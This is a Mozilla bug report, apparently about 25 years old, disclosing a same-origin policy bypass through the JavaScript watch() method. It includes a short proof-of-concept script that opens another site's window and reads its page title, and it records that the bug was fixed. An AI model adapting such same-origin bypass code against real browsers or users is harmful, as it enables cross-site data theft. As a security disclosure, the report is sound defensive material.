Closed
Bug 25864
Opened 25 years ago
Closed 25 years ago
watch() vulnerability
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M14
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
(Whiteboard: [PDT+])
The watch() method allows circumventing Same Origin security policy.
The code is:
-----------------------------------------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com","victim");
function f()
{
a.document.watch("title",function (id,oldval,newval) {alert('The page title is:
'+oldval);})
}
setTimeout("f();a.document.title='title';",10000);
</SCRIPT>
-----------------------------------------------------------------------
Assignee | ||
Updated•25 years ago
|
Assignee | ||
Updated•25 years ago
|
Group: netscapeconfidential?
Assignee | ||
Comment 1•25 years ago
|
||
Fixed; added a new callback from the generated DOM code.
Group: netscapeconfidential?
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in
before you can comment on or make changes to this bug.
Description
•